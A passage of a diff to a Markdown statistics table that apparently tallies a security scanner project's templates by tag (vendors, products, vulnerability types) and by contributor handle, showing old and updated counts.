| | | | | | | -| ognl | 8 | 0xsmiley | 2 | | | | | | | -| symantec | 8 | bp0lr | 2 | | | | | | | -| bucket | 8 | thezakman | 2 | | | | | | | -| config-audit | 8 | vavkamil | 2 | | | | | | | -| huawei | 8 | udit_thakkur | 2 | | | | | | | -| cisco-switch | 8 | afaq | 2 | | | | | | | -| spotweb | 8 | lotusdll | 2 | | | | | | | -| hms | 8 | danielmofer | 2 | | | | | | | -| manager | 8 | liwermor | 2 | | | | | | | -| metadata | 8 | israel comazzetto dos reis | 2 | | | | | | | -| cloud-enum | 8 | joshlarsen | 2 | | | | | | | -| phpjabbers | 8 | convisoappsec | 2 | | | | | | | -| phpinfo | 8 | martincodes-de | 2 | | | | | | | -| error | 8 | maximus decimus | 2 | | | | | | | -| mirai | 8 | shelled | 2 | | | | | | | -| discord | 8 | kiblyn11 | 2 | | | | | | | -| nacos | 7 | ricardo maia (brainfork) | 2 | | | | | | | -| car_rental_management_system_project | 7 | 0xelkomy | 2 | | | | | | | -| fortios | 7 | thabisocn | 2 | | | | | | | -| linkedin | 7 | dahse89 | 2 | | | | | | | -| telesquare | 7 | c3l3si4n | 2 | | | | | | | -| ruckus | 7 | hackerarpan | 2 | | | | | | | -| exploitdb | 7 | hateshape | 1 | | | | | | | -| opensis | 7 | yavolo | 1 | | | | | | | -| pmb | 7 | mchklt | 1 | | | | | | | -| vms | 7 | jc175 | 1 | | | | | | | -| avtech | 7 | duty_1g | 1 | | | | | | | -| instrusive | 7 | jonathanwalker | 1 | | | | | | | -| nexus | 7 | exploitation | 1 | | | | | | | -| websphere | 7 | pjborah | 1 | | | | | | | -| monstra | 7 | houdinis | 1 | | | | | | | -| maps | 7 | stupidfish | 1 | | | | | | | -| cacti | 7 | philippdelteil | 1 | | | | | | | -| gogs | 7 | elmahdi | 1 | | | | | | | -| filemanager | 7 | jiheon-dev | 1 | | | | | | | -| squirrelmail | 7 | joaonevess | 1 | | | | | | | -| contec | 7 | domenicoveneziano | 1 | | | | | | | -| keking | 7 | samuelsamuelsamuel | 1 | | | | | | | -| rfi | 7 | hexcat | 1 | | | | | | | -| activemq | 7 | fmunozs | 1 | | | | | | | -| bigip | 7 | fpatrik | 1 | | | | | | | -| solarwinds | 7 | mr.bobo hp | 1 | | | | | | | -| fpd | 7 | shifacyclewla | 1 | | | | | | | -| nortekcontrol | 7 | bibeksapkota (sar00n) | 1 | | | | | | | -| vpc | 7 | mah3sec_ | 1 | | | | | | | -| twitter | 7 | wabafet | 1 | | | | | | | -| database | 7 | zinminphy0 | 1 | | | | | | | -| landray | 7 | yusakie | 1 | | | | | | | -| joomla\! | 7 | bughuntersurya | 1 | | | | | | | -| moodating | 7 | hanlaomo | 1 | | | | | | | -| oos | 7 | aceseven (digisec360) | 1 | | | | | | | -| mobileiron | 7 | narluin | 1 | | | | | | | -| f5 | 7 | none | 1 | | | | | | | -| bloofox | 7 | pepitoh | 1 | | | | | | | -| slack | 7 | r3s ost | 1 | | | | | | | -| nagiosxi | 7 | qianbenhyu | 1 | | | | | | | -| shopify | 7 | mrcl0wnlab | 1 | | | | | | | -| blockchain | 7 | apt-mirror | 1 | | | | | | | -| mongodb | 7 | f0xy | 1 | | | | | | | -| couchdb | 6 | remi gascou (podalirius) | 1 | | | | | | | -| doctor_appointment_system_project | 6 | rotembar | 1 | | | | | | | -| magmi | 6 | 0xkayala | 1 | | | | | | | -| synacor | 6 | yuansec | 1 | | | | | | | -| doctor-appointment-system | 6 | hardik-rathod | 1 | | | | | | | -| log | 6 | ramkrishna sawant | 1 | | | | | | | -| 74cms | 6 | ofjaaah | 1 | | | | | | | -| elfinder | 6 | wlayzz | 1 | | | | | | | -| cobbler | 6 | rivalsec | 1 | | | | | | | -| webmin | 6 | lixts | 1 | | | | | | | -| typo3 | 6 | erikowen | 1 | | | | | | | -| jetty | 6 | youngpope | 1 | | | | | | | -| asp | 6 | tim_koopmans | 1 | | | | | | | -| jeecg | 6 | therealtoastycat | 1 | | | | | | | -| openvpn | 6 | alperenkesk | 1 | | | | | | | -| geoserver | 6 | lstatro | 1 | | | | | | | -| plesk | 6 | geraldino2 | 1 | | | | | | | -| teamcity | 6 | nerrorsec | 1 | | | | | | | -| gcp | 6 | sospiro | 1 | | | | | | | -| rat | 6 | null_hypothesis | 1 | | | | | | | -| microfocus | 6 | justmumu | 1 | | | | | | | -| advantech | 6 | ok_bye_now | 1 | | | | | | | -| servicenow | 6 | team syslifters / christoph | 1 | | | | | | | +| atom | 8 | maximus decimus | 2 | | | | | | | +| symantec | 8 | n-thumann | 2 | | | | | | | +| cisco-switch | 8 | ayadim | 2 | | | | | | | +| emerge | 8 | israel comazzetto dos reis | 2 | | | | | | | +| oauth | 8 | manas_harsh | 2 | | | | | | | +| unauthenticated | 8 | gevakun | 2 | | | | | | | +| huawei | 8 | nuk3s3c | 2 | | | | | | | +| mirai | 8 | rafaelwdornelas | 2 | | | | | | | +| osint-news | 8 | liwermor | 2 | | | | | | | +| error | 8 | ep1csage | 2 | | | | | | | +| wanhu | 8 | z0ne | 2 | | | | | | | +| go | 8 | clarkvoss | 2 | | | | | | | +| metadata | 8 | luci | 2 | | | | | | | +| default-page | 8 | 0xelkomy | 2 | | | | | | | +| ruckus | 7 | davidegirardi | 2 | | | | | | | +| monstra | 7 | uomogrande | 2 | | | | | | | +| keking | 7 | msegoviag | 2 | | | | | | | +| openemr | 7 | 8arthur | 2 | | | | | | | +| teamcity | 7 | dbrwsky | 2 | | | | | | | +| vpc | 7 | hackerarpan | 2 | | | | | | | +| filemanager | 7 | socketz | 2 | | | | | | | +| avtech | 7 | moritz nentwig | 2 | | | | | | | +| fpd | 7 | alex | 1 | | | | | | | +| nortekcontrol | 7 | rotembar | 1 | | | | | | | +| nacos | 7 | ipanda | 1 | | | | | | | +| fortios | 7 | dale clarke | 1 | | | | | | | +| database | 7 | caon | 1 | | | | | | | +| joomla\! | 7 | remi gascou (podalirius) | 1 | | | | | | | +| instrusive | 7 | dabla | 1 | | | | | | | +| car_rental_management_system_project | 7 | thebinitghimire | 1 | | | | | | | +| gogs | 7 | akash.c | 1 | | | | | | | +| squirrelmail | 7 | dmartyn | 1 | | | | | | | +| opensis | 7 | zinminphy0 | 1 | | | | | | | +| rfi | 7 | udinchan | 1 | | | | | | | +| oos | 7 | shivampand3y | 1 | | | | | | | +| activemq | 7 | carson chan | 1 | | | | | | | +| f5 | 7 | yashanand155 | 1 | | | | | | | +| bloofox | 7 | kareemse1im | 1 | | | | | | | +| vms | 7 | aresx | 1 | | | | | | | +| nagiosxi | 7 | kchason | 1 | | | | | | | +| contec | 7 | whynotke | 1 | | | | | | | +| mongodb | 7 | tirtha | 1 | | | | | | | +| blockchain | 7 | watchtowr | 1 | | | | | | | +| shopify | 7 | ap3r | 1 | | | | | | | +| pmb | 7 | ptonewreckin | 1 | | | | | | | +| moodating | 7 | gboddin | 1 | | | | | | | +| bigip | 7 | mayankpandey01 | 1 | | | | | | | +| mobileiron | 7 | adilsoybali | 1 | | | | | | | +| landray | 7 | official_blackhat13 | 1 | | | | | | | +| nexus | 7 | j3ssie/geraldino2 | 1 | | | | | | | +| slack | 7 | zandros0 | 1 | | | | | | | +| twitter | 7 | shreyapohekar | 1 | | | | | | | +| exploitdb | 7 | petruknisme | 1 | | | | | | | +| solarwinds | 7 | luskabol | 1 | | | | | | | +| telesquare | 7 | h4kux | 1 | | | | | | | +| linkedin | 7 | galoget | 1 | | | | | | | +| maps | 7 | p-l- | 1 | | | | | | | +| cacti | 7 | yaser_s | 1 | | | | | | | +| websphere | 7 | adnanekhan | 1 | | | | | | | +| flutterwave | 6 | ahmed abou-ela | 1 | | | | | | | +| gcp | 6 | b4uh0lz | 1 | | | | | | | +| cobbler | 6 | ohlinge | 1 | | | | | | | +| webmin | 6 | freakyclown | 1 | | | | | | | +| servicenow | 6 | 0xkayala | 1 | | | | | | | +| ldap | 6 | team syslifters / christoph | 1 | | | | | | | | | | mahrl | | | | | | | | -| chanjet | 6 | mabdullah22 | 1 | | | | | | | -| cockpit | 6 | k3rwin | 1 | | | | | | | -| paypal | 6 | whotwagner | 1 | | | | | | | -| flutterwave | 6 | amirmsafari | 1 | | | | | | | -| sonarqube | 6 | aayush vishnoi | 1 | | | | | | | -| zhiyuan | 6 | b0yd | 1 | | | | | | | -| jamf | 6 | realexp3rt | 1 | | | | | | | -| asus | 6 | jbertman | 1 | | | | | | | -| beyondtrust | 6 | sshell | 1 | | | | | | | -| express | 6 | infosecsanyam | 1 | | | | | | | -| splunk | 6 | nagli | 1 | | | | | | | -| microstrategy | 6 | sanineng | 1 | | | | | | | -| lfprojects | 6 | jaskaran | 1 | | | | | | | -| keycloak | 6 | nuts7 | 1 | | | | | | | -| sql | 6 | lbb | 1 | | | | | | | -| leak | 6 | udinchan | 1 | | | | | | | -| liferay | 6 | kailashbohara | 1 | | | | | | | -| kubelet | 6 | luqmaan hadia | 1 | | | | | | | -| tikiwiki | 6 | aaban solutions | 1 | | | | | | | -| minio | 6 | barthy.koeln | 1 | | | | | | | -| vrealize | 6 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| goanywhere | 5 | iampritam | 1 | | | | | | | -| ethereum | 5 | w0tx | 1 | | | | | | | -| paloaltonetworks | 5 | deena | 1 | | | | | | | -| chamilo | 5 | egemenkochisarli | 1 | | | | | | | -| cve2007 | 5 | flag007 | 1 | | | | | | | -| wbce | 5 | axrk | 1 | | | | | | | -| server | 5 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| voip | 5 | phyr3wall | 1 | | | | | | | -| xmlrpc | 5 | byobin | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | aron molnar | 1 | | | | | | | -| qnap | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | -| cloudflare | 5 | orpheus | 1 | | | | | | | -| openai | 5 | izn0u | 1 | | | | | | | -| tibco | 5 | vulnspace | 1 | | | | | | | -| square | 5 | micha3lb3n | 1 | | | | | | | -| ldap | 5 | 8authur | 1 | | | | | | | -| akamai | 5 | aringo-bf | 1 | | | | | | | -| jabber | 5 | win3zz | 1 | | | | | | | -| thedigitalcraft | 5 | yiran | 1 | | | | | | | -| firmware | 5 | kurohost | 1 | | | | | | | -| sysaid | 5 | furkansenan | 1 | | | | | | | -| gateway | 5 | archer | 1 | | | | | | | -| fatpipe | 5 | alevsk | 1 | | | | | | | -| strapi | 5 | spac3wh1te | 1 | | | | | | | -| sentry | 5 | ahmed abou-ela | 1 | | | | | | | -| asana | 5 | lark lab | 1 | | | | | | | -| openemr | 5 | revblock | 1 | | | | | | | -| ems | 5 | petruknisme | 1 | | | | | | | -| storage | 5 | noah @thesubtlety | 1 | | | | | | | -| kkfileview | 5 | viniciuspereiras | 1 | | | | | | | -| cnvd2023 | 5 | ipanda | 1 | | | | | | | -| terramaster | 5 | ptonewreckin | 1 | | | | | | | -| schneider-electric | 5 | compr00t | 1 | | | | | | | -| magmi_project | 5 | _c0wb0y_ | 1 | | | | | | | -| parallels | 5 | unknown | 1 | | | | | | | -| rseenet | 5 | ratnadip gajbhiye | 1 | | | | | | | -| craftcms | 5 | phillipo | 1 | | | | | | | -| hpe | 5 | sickwell | 1 | | | | | | | -| redmine | 5 | jrolf | 1 | | | | | | | -| mssql | 5 | xeldax | 1 | | | | | | | -| connectwise | 5 | 0xteles | 1 | | | | | | | -| glpi-project | 5 | vzamanillo | 1 | | | | | | | -| genetechsolutions | 5 | palanichamy_perumal | 1 | | | | | | | -| percha | 5 | opencirt | 1 | | | | | | | -| nuuo | 5 | west-wise | 1 | | | | | | | -| graylog | 5 | chron0x | 1 | | | | | | | -| jupyter | 5 | higor melgaço | 1 | | | | | | | -| gocd | 5 | pry0cc | 1 | | | | | | | -| avideo | 5 | juliosmelo | 1 | | | | | | | -| zzzcms | 5 | dievus | 1 | | | | | | | -| totolink | 5 | sherlocksecurity | 1 | | | | | | | -| dionaea | 5 | shivampand3y | 1 | | | | | | | -| decision-center | 5 | yashanand155 | 1 | | | | | | | -| metinfo | 5 | jcockhren | 1 | | | | | | | -| apisix | 5 | xc1ym | 1 | | | | | | | -| 10web | 5 | ling | 1 | | | | | | | -| tenda | 5 | carlosvieira | 1 | | | | | | | -| acm | 5 | lingtren | 1 | | | | | | | -| circarlife | 5 | mihhailsokolov | 1 | | | | | | | -| adminer | 5 | arjunchandarana | 1 | | | | | | | -| resin | 5 | juicypotato1 | 1 | | | | | | | -| openstack | 5 | fopina | 1 | | | | | | | -| hybris | 5 | exid | 1 | | | | | | | -| web3 | 5 | amnotacat | 1 | | | | | | | -| papercut | 5 | osamahamad | 1 | | | | | | | -| mikrotik | 5 | ahmetpergamum | 1 | | | | | | | -| awstats | 5 | th3.d1p4k | 1 | | | | | | | -| avaya | 5 | retr02332 | 1 | | | | | | | -| pyload | 5 | ap3r | 1 | | | | | | | -| axigen | 5 | manuelbua | 1 | | | | | | | -| carrental | 5 | tirtha_mandal | 1 | | | | | | | -| sftp | 5 | mayankpandey01 | 1 | | | | | | | -| caucho | 5 | 0xtavian | 1 | | | | | | | -| circontrol | 5 | michael wedl | 1 | | | | | | | -| swagger | 5 | esonhugh | 1 | | | | | | | -| adb | 5 | amir-h-fallahi | 1 | | | | | | | -| webview | 5 | caon | 1 | | | | | | | -| react | 5 | 0xprial | 1 | | | | | | | -| bmc | 5 | mbmy | 1 | | | | | | | -| elementor | 5 | r3nz0 | 1 | | | | | | | -| agentejo | 5 | qlkwej | 1 | | | | | | | -| matrix | 5 | mubassirpatel | 1 | | | | | | | -| jwt | 5 | hakimkt | 1 | | | | | | | -| flickr | 4 | jbaines-r7 | 1 | | | | | | | -| metasploit | 4 | hyunsoo-ds | 1 | | | | | | | -| newstatpress_project | 4 | drfabiocastro | 1 | | | | | | | -| dotnet | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| kentico | 4 | secthebit | 1 | | | | | | | -| phppgadmin | 4 | act1on3 | 1 | | | | | | | -| d-link | 4 | marcio mendes | 1 | | | | | | | -| roxy | 4 | cravaterouge | 1 | | | | | | | -| rabbitmq | 4 | notwhy | 1 | | | | | | | -| angular | 4 | push4d | 1 | | | | | | | -| gnuboard | 4 | thelicato | 1 | | | | | | | -| dolibarr | 4 | ldionmarcil | 1 | | | | | | | -| horde | 4 | h4kux | 1 | | | | | | | -| qdpm | 4 | daviey | 1 | | | | | | | -| powerjob | 4 | rojanrijal | 1 | | | | | | | -| kevinlab | 4 | smaranchand | 1 | | | | | | | -| easypost | 4 | petergrifin | 1 | | | | | | | -| reprisesoftware | 4 | th3r4id | 1 | | | | | | | -| photo | 4 | invisiblethreat | 1 | | | | | | | -| dropbear | 4 | gpiechnik2 | 1 | | | | | | | -| flatpress | 4 | irshadahamed | 1 | | | | | | | -| harbor | 4 | patrick pirker | 1 | | | | | | | -| eclipse | 4 | bugvsme | 1 | | | | | | | -| learnpress | 4 | d4ly | 1 | | | | | | | -| purchase_order_management_system_project | 4 | furkansayim | 1 | | | | | | | -| globalprotect | 4 | mayank_pandey01 | 1 | | | | | | | -| intelbras | 4 | ph33rr | 1 | | | | | | | -| thinkcmf | 4 | technicaljunkie | 1 | | | | | | | -| veronalabs | 4 | brabbit10 | 1 | | | | | | | -| dom | 4 | ransomsec | 1 | | | | | | | -| harmistechnology | 4 | omarkurt | 1 | | | | | | | -| webshell | 4 | tea | 1 | | | | | | | -| mailchimp | 4 | httpvoid | 1 | | | | | | | -| sound4 | 4 | vinit989 | 1 | | | | | | | -| bittrex | 4 | ynnirc | 1 | | | | | | | -| springcloud | 4 | mass0ma | 1 | | | | | | | -| igniterealtime | 4 | mesaglio | 1 | | | | | | | -| pip | 4 | alex | 1 | | | | | | | -| panos | 4 | millermedia | 1 | | | | | | | -| auieo | 4 | chesterblue | 1 | | | | | | | -| osint-archived | 4 | 5up3r541y4n | 1 | | | | | | | -| zend | 4 | sak1 | 1 | | | | | | | -| cve2005 | 4 | whynotke | 1 | | | | | | | -| dahuasecurity | 4 | shockwave | 1 | | | | | | | -| password | 4 | miroslavsotak | 1 | | | | | | | -| kyocera | 4 | sorrowx3 | 1 | | | | | | | -| figma | 4 | harshinsecurity | 1 | | | | | | | -| opencms | 4 | ilovebinbash | 1 | | | | | | | -| ebs | 4 | ky9oss | 1 | | | | | | | -| joomlamo | 4 | ayadi | 1 | | | | | | | -| bamboo | 4 | jacalynli | 1 | | | | | | | -| webkul | 4 | absshax | 1 | | | | | | | -| spark | 4 | adrianmf | 1 | | | | | | | -| mostracms | 4 | m0ck3d | 1 | | | | | | | -| wp-statistics | 4 | clment cruchet | 1 | | | | | | | -| puppet | 4 | blckraven | 1 | | | | | | | -| mantisbt | 4 | banana69 | 1 | | | | | | | -| wpdevart | 4 | 0xh7ml | 1 | | | | | | | -| royalevent | 4 | nielsing | 1 | | | | | | | -| pluginus | 4 | kba@sogeti_esec | 1 | | | | | | | -| jsf | 4 | alexrydzak | 1 | | | | | | | -| ampache | 4 | allenwest24 | 1 | | | | | | | -| linksys | 4 | tehtbl | 1 | | | | | | | -| bitrix | 4 | vikas kundu | 1 | | | | | | | -| candidats | 4 | p-l- | 1 | | | | | | | -| http | 4 | pratik khalane | 1 | | | | | | | -| metabase | 4 | jfbes | 1 | | | | | | | -| datadog | 4 | aaronchen0 | 1 | | | | | | | -| artifactory | 4 | failopen | 1 | | | | | | | -| pega | 4 | abbas.heybati | 1 | | | | | | | -| fit2cloud | 4 | sttlr | 1 | | | | | | | -| flink | 4 | anon-artist | 1 | | | | | | | -| httpserver | 4 | omarjezi | 1 | | | | | | | -| salesforce | 4 | x6263 | 1 | | | | | | | -| juniper | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| okta | 4 | pascalheidmann | 1 | | | | | | | -| prtg | 4 | shivanshkhari | 1 | | | | | | | -| confluent | 4 | couskito | 1 | | | | | | | -| hospital_management_system_project | 4 | booboohq | 1 | | | | | | | -| env | 4 | bywalks | 1 | | | | | | | -| consul | 4 | un-fmunozs | 1 | | | | | | | -| hongfan | 4 | cbadke | 1 | | | | | | | -| concrete | 4 | jeya seelan | 1 | | | | | | | -| audiocodes | 4 | 2rs3c | 1 | | | | | | | -| aria | 4 | xshuden | 1 | | | | | | | -| kingsoft | 4 | mukundbhuva | 1 | | | | | | | -| cnvd2019 | 4 | official_blackhat13 | 1 | | | | | | | -| hongdian | 4 | josecosta | 1 | | | | | | | -| sugarcrm | 4 | daffianfo | 1 | | | | | | | -| search | 4 | wpsec | 1 | | | | | | | -| terra-master | 4 | akash.c | 1 | | | | | | | -| pentaho | 4 | kiks7 | 1 | | | | | | | -| mcafee | 4 | ruppde | 1 | | | | | | | -| linkerd | 4 | mammad_rahimzada | 1 | | | | | | | -| httpd | 4 | nytr0gen | 1 | | | | | | | -| froxlor | 4 | akshansh | 1 | | | | | | | -| ternaria | 4 | tirtha | 1 | | | | | | | -| hoteldruid | 4 | screamy | 1 | | | | | | | -| nextjs | 4 | andysvints | 1 | | | | | | | -| linuxfoundation | 4 | jeya.seelan | 1 | | | | | | | -| seagate | 4 | w8ay | 1 | | | | | | | -| heroku | 4 | 0xceeb | 1 | | | | | | | -| djangoproject | 4 | s1r1us | 1 | | | | | | | -| aura | 4 | denandz | 1 | | | | | | | -| webmail | 4 | jna1 | 1 | | | | | | | -| jorani | 4 | t3l3machus | 1 | | | | | | | -| age-encryption | 4 | 1nf1n7y | 1 | | | | | | | -| arcgis | 4 | elouhi | 1 | | | | | | | -| phpjabber | 4 | godfatherorwa | 1 | | | | | | | -| rocketchat | 4 | lamscun | 1 | | | | | | | -| stripe | 4 | igibanez | 1 | | | | | | | -| shiro | 4 | soyelmago | 1 | | | | | | | -| mautic | 4 | nobody | 1 | | | | | | | -| osgeo | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| grav | 4 | manasmbellani | 1 | | | | | | | -| wcs | 4 | tangxiaofeng7 | 1 | | | | | | | -| pmb_project | 4 | ooooooo_q | 1 | | | | | | | -| os4ed | 4 | bartu utku sarp | 1 | | | | | | | -| rubyonrails | 4 | af001 | 1 | | | | | | | -| owncloud | 4 | becivells | 1 | | | | | | | -| casaos | 4 | metascan | 1 | | | | | | | -| openfire | 4 | 0xd0ff9 | 1 | | | | | | | -| codeigniter | 4 | oscarintherocks | 1 | | | | | | | -| mostra | 4 | intx0x80 | 1 | | | | | | | -| aspose | 4 | liquidsec | 1 | | | | | | | -| yeswiki | 4 | hotpot | 1 | | | | | | | -| centos | 4 | mordavid | 1 | | | | | | | -| articatech | 4 | am0nt31r0 | 1 | | | | | | | -| umbraco | 4 | noobexploiter | 1 | | | | | | | -| moveit | 4 | iphantasmic | 1 | | | | | | | -| tiki | 4 | hakluke | 1 | | | | | | | -| kibana | 4 | ndmalc | 1 | | | | | | | -| mitel | 4 | retr0 | 1 | | | | | | | -| panabit | 4 | sdcampbell | 1 | | | | | | | -| telegram | 4 | rotemreiss | 1 | | | | | | | -| newstatpress | 4 | 0h1in9e | 1 | | | | | | | -| metersphere | 4 | francescocarlucci | 1 | | | | | | | -| finicity | 4 | zeyad azima | 1 | | | | | | | -| nosqli | 4 | miguelsegoviagil | 1 | | | | | | | -| wireguard | 4 | momen eldawakhly | 1 | | | | | | | -| cnvd2022 | 4 | jaimin gondaliya | 1 | | | | | | | -| pie-register | 4 | regala_ | 1 | | | | | | | -| sendgrid | 4 | gboddin | 1 | | | | | | | -| pixie | 4 | savik | 1 | | | | | | | -| postmessage | 4 | luqman | 1 | | | | | | | -| jfrog | 4 | danigoland | 1 | | | | | | | -| digitaldruid | 4 | brianlam38 | 1 | | | | | | | -| churchcrm | 4 | berkdusunur | 1 | | | | | | | -| telerik | 4 | zhenwarx | 1 | | | | | | | -| jellyfin | 4 | hczdmr | 1 | | | | | | | -| zte | 4 | f1she3 | 1 | | | | | | | -| ray | 4 | myst7ic | 1 | | | | | | | -| info | 4 | guax1 | 1 | | | | | | | -| h3c | 4 | eremit4 | 1 | | | | | | | -| softwarepublico | 3 | ahmed sherif | 1 | | | | | | | -| rpm | 3 | willd96 | 1 | | | | | | | -| kfm | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| epson | 3 | _darrenmartyn | 1 | | | | | | | -| securepoint | 3 | erethon | 1 | | | | | | | -| lansweeper | 3 | _harleo | 1 | | | | | | | -| truenas | 3 | dk999 | 1 | | | | | | | -| backdropcms | 3 | carson chan | 1 | | | | | | | -| mongo | 3 | lethargynavigator | 1 | | | | | | | -| r-seenet | 3 | djoevanka | 1 | | | | | | | -| loytec | 3 | mariam tariq | 1 | | | | | | | -| pulsar | 3 | rubina119 | 1 | | | | | | | -| 3cx | 3 | yashgoti | 1 | | | | | | | -| smuggling | 3 | xcapri | 1 | | | | | | | -| weiphp | 3 | ledoubletake | 1 | | | | | | | -| spip | 3 | pwnwithlove | 1 | | | | | | | -| particle | 3 | toufik-airane | 1 | | | | | | | -| glassfish | 3 | pdp | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | floriandewald | 1 | | | | | | | -| learndash | 3 | luskabol | 1 | | | | | | | -| cpanel | 3 | kareemse1im | 1 | | | | | | | -| segment | 3 | lrtk-coder | 1 | | | | | | | -| finecms | 3 | elder tao | 1 | | | | | | | -| ghost | 3 | adamparsons | 1 | | | | | | | -| xerox | 3 | ramondunker | 1 | | | | | | | -| structurizr | 3 | jas37 | 1 | | | | | | | -| wordfence | 3 | shelld3v | 1 | | | | | | | -| webalizer | 3 | galoget | 1 | | | | | | | -| axis2 | 3 | makyotox | 1 | | | | | | | -| trendnet | 3 | elitebaz | 1 | | | | | | | -| checkpoint | 3 | schniggie | 1 | | | | | | | -| diagrams | 3 | prettyboyaaditya | 1 | | | | | | | -| ueditor | 3 | 0xcharan | 1 | | | | | | | -| buffalo | 3 | b0rn2r00t | 1 | | | | | | | -| lotus | 3 | remonsec | 1 | | | | | | | -| thefactory | 3 | charanrayudu | 1 | | | | | | | -| wwbn | 3 | borna nematzadeh | 1 | | | | | | | -| jeesns | 3 | naglis | 1 | | | | | | | -| mailgun | 3 | affix | 1 | | | | | | | -| magnolia | 3 | paper-pen | 1 | | | | | | | -| geowebserver | 3 | carrot2 | 1 | | | | | | | -| carel | 3 | shreyapohekar | 1 | | | | | | | -| telnet | 3 | piyushchhiroliya | 1 | | | | | | | -| netdata | 3 | b4uh0lz | 1 | | | | | | | -| axis | 3 | udyz | 1 | | | | | | | -| rancher | 3 | dwbzn | 1 | | | | | | | -| adiscon | 3 | fur1na | 1 | | | | | | | -| axway | 3 | jteles | 1 | | | | | | | -| instagram | 3 | mantissts | 1 | | | | | | | -| automattic | 3 | olewagner | 1 | | | | | | | -| gradle | 3 | miryangjung | 1 | | | | | | | -| actuator | 3 | bernardo rodrigues | 1 | | | | | | | +| paypal | 6 | rivalsec | 1 | | | | | | | +| asus | 6 | domenicoveneziano | 1 | | | | | | | +| zhiyuan | 6 | hlop | 1 | | | | | | | +| plesk | 6 | tea | 1 | | | | | | | +| geoserver | 6 | mr.bobo hp | 1 | | | | | | | +| doctor_appointment_system_project | 6 | smaranchand | 1 | | | | | | | +| microfocus | 6 | christbowel | 1 | | | | | | | +| elfinder | 6 | archer | 1 | | | | | | | +| 74cms | 6 | natto97 | 1 | | | | | | | +| couchdb | 6 | ling | 1 | | | | | | | +| chanjet | 6 | mchklt | 1 | | | | | | | +| magmi | 6 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| cockpit | 6 | s1r1u5_ | 1 | | | | | | | +| openvpn | 6 | noamrathaus | 1 | | | | | | | +| jetty | 6 | retr0 | 1 | | | | | | | +| advantech | 6 | tim_koopmans | 1 | | | | | | | +| asp | 6 | shifacyclewla | 1 | | | | | | | +| synacor | 6 | banana69 | 1 | | | | | | | +| express | 6 | philippdelteil | 1 | | | | | | | +| keycloak | 6 | soyelmago | 1 | | | | | | | +| leak | 6 | f1she3 | 1 | | | | | | | +| liferay | 6 | w8ay | 1 | | | | | | | +| minio | 6 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| rat | 6 | sttlr | 1 | | | | | | | +| jamf | 6 | ilovebinbash | 1 | | | | | | | +| kubelet | 6 | higor melgaço (eremit4) | 1 | | | | | | | +| lfprojects | 6 | booboohq | 1 | | | | | | | +| server | 6 | viondexd | 1 | | | | | | | +| sql | 6 | zhenwarx | 1 | | | | | | | +| bmc | 6 | regala_ | 1 | | | | | | | +| doctor-appointment-system | 6 | tehtbl | 1 | | | | | | | +| jeecg | 6 | lbb | 1 | | | | | | | +| log | 6 | youngpope | 1 | | | | | | | +| beyondtrust | 6 | 0ut0fb4nd | 1 | | | | | | | +| microstrategy | 6 | ratnadip gajbhiye | 1 | | | | | | | +| splunk | 6 | millermedia | 1 | | | | | | | +| vrealize | 6 | am0nt31r0 | 1 | | | | | | | +| tikiwiki | 6 | aravind | 1 | | | | | | | +| sonarqube | 6 | amirmsafari | 1 | | | | | | | +| typo3 | 6 | rinolock | 1 | | | | | | | +| nuuo | 5 | chesterblue | 1 | | | | | | | +| kkfileview | 5 | mlec | 1 | | | | | | | +| pyload | 5 | r3s ost | 1 | | | | | | | +| sentry | 5 | bughuntersurya | 1 | | | | | | | +| square | 5 | m0ck3d | 1 | | | | | | | +| carrental | 5 | aaronchen0 | 1 | | | | | | | +| genetechsolutions | 5 | dorkerdevil | 1 | | | | | | | +| goanywhere | 5 | furkansenan | 1 | | | | | | | +| redmine | 5 | wpsec | 1 | | | | | | | +| metinfo | 5 | unknown | 1 | | | | | | | +| chamilo | 5 | arall | 1 | | | | | | | +| react | 5 | xeldax | 1 | | | | | | | +| circarlife | 5 | knassar702 | 1 | | | | | | | +| percha | 5 | absshax | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | aayush vishnoi | 1 | | | | | | | +| circontrol | 5 | affix | 1 | | | | | | | +| mikrotik | 5 | charanrayudu | 1 | | | | | | | +| papercut | 5 | _c0wb0y_ | 1 | | | | | | | +| awstats | 5 | d0rkerdevil | 1 | | | | | | | +| apisix | 5 | xstp | 1 | | | | | | | +| matrix | 5 | mammad_rahimzada | 1 | | | | | | | +| open-emr | 5 | elitebaz | 1 | | | | | | | +| rseenet | 5 | harryha | 1 | | | | | | | +| cnvd2023 | 5 | lark lab | 1 | | | | | | | +| hpe | 5 | hakimkt | 1 | | | | | | | +| xmlrpc | 5 | jub0bs | 1 | | | | | | | +| tenda | 5 | aringo-bf | 1 | | | | | | | +| voip | 5 | tangxiaofeng7 | 1 | | | | | | | +| parallels | 5 | brianlam38 | 1 | | | | | | | +| graylog | 5 | dwbzn | 1 | | | | | | | +| agentejo | 5 | iampritam | 1 | | | | | | | +| terramaster | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| tibco | 5 | manasmbellani | 1 | | | | | | | +| schneider-electric | 5 | clment cruchet | 1 | | | | | | | +| adminer | 5 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | | | | | | | | -| school_dormitory_management_system_project | 3 | thebinitghimire | 1 | | | | | | | -| etsy | 3 | droberson | 1 | | | | | | | -| watchguard | 3 | 0xrod | 1 | | | | | | | -| jitsi | 3 | notsoevilweasel | 1 | | | | | | | -| bigant | 3 | sicksec | 1 | | | | | | | -| messaging | 3 | queencitycyber | 1 | | | | | | | -| payara | 3 | unkl4b | 1 | | | | | | | -| superadmin | 3 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| yii | 3 | patralos | 1 | | | | | | | -| airtable | 3 | arall | 1 | | | | | | | -| strangerstudios | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| sharepoint | 3 | 0xparth | 1 | | | | | | | -| cluster | 3 | skylark-lab | 1 | | | | | | | -| 